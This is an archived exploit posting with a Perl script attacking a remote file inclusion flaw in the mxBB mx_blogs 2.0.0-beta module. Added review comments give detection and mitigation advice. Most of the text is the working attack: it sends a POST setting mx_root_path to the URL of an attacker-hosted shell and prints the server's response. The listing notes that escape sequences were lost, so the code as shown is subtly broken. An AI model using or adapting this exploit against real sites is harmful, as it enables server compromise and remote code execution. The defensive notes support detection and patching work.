
mxbbmxblogs-rfi.txt

Posted on 01 April 2008

# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit
#
# Vendor: http://www.mx-system.com
# Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405
# Vulncode in: /includes/functions_weblog.php line 24
# Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN
#
# NOTE(review): this listing arrived collapsed onto a single line, and
# backslash sequences inside the string literals appear to have been lost in
# extraction. The code below is reproduced token-for-token; only line breaks
# and comments were added.
#
# What the listing shows a defender:
#   * The request goes straight to <module dir>/includes/functions_weblog.php,
#     i.e. an include file that is reachable over HTTP.
#   * The only parameter sent is mx_root_path, carried in a form-encoded POST
#     body, and its value is a URL.
#   * The PHP side is not shown on this page. Presumably mx_root_path ends up
#     in an include/require path (the header above cites line 24) -- confirm
#     against the module source.
#
# Detection: look for direct requests to .../includes/functions_weblog.php
# that carry an mx_root_path parameter whose value starts with a URL scheme.
# Because the value travels in the POST body, access logs that record only
# the request line will show the path but not the parameter; request-body
# logging or a WAF/IDS rule on the body is needed to see it.
#
# Mitigation: update or remove the module; make files under includes/ refuse
# direct requests; assign the root-path variable server-side before any
# include rather than accepting it from the request; keep allow_url_include
# disabled (and register_globals off on PHP versions that still offer it).

use Getopt::Long;
use URI::Escape;
use IO::Socket;

# Placeholder payload URL, used when -f is not given.
$shellcode = "Insert the url to shell here";

main();

# Print the option summary and exit.
sub usage {
    print "mxBB Module mx_blogs 2.0.0-beta Remote File Include Expl ";
    print "by bd0rk <www.soh-crew.it.tt> ";
    print "-t, --ttarget (someone.com) ";
    print "-f, --tshell (url to your shellcode) ";
    print "-d, --dir (/mx_blogs) ";
    exit;
}

# Read the options, send one POST request to the include file and print the
# server's response.
sub main {
    # Option spec: target host, payload URL, module directory.
    GetOptions ('t|target=s' => $target,'f|shell=s' => $shell,'d|dir=s' => $dir);
    usage() unless $target;

    # Prefer the -f value over the placeholder when one was supplied.
    $shellcode = $shell unless !$shell;
    $url = uri_escape($shellcode);

    # Plain TCP connection to port 80 of the target host (no TLS).
    $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die " Connection() failed. ";
    print " Connected to ".$target.", injecting shellcode. ";

    # Request body: the single parameter mx_root_path set to the escaped URL.
    # This parameter name is the indicator to search for in request bodies.
    $sendurl = "mx_root_path=".$url."";
    $sendlen = length($sendurl);

    # Hand-built HTTP request addressed to the module's include file.
    print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1 ";
    print $sock "Host: ".$target." ";
    print $sock "Connection: close ";
    print $sock "Content-Type: application/x-www-form-urlencoded ";
    print $sock "Content-Length: ".$sendlen." ";
    print $sock $sendurl;

    # Echo whatever the server returns.
    print "Attempted to include shellcode, Response: ";
    while($recvd = <$sock>) {
        print " ".$recvd."";
    }
    exit;
}

 
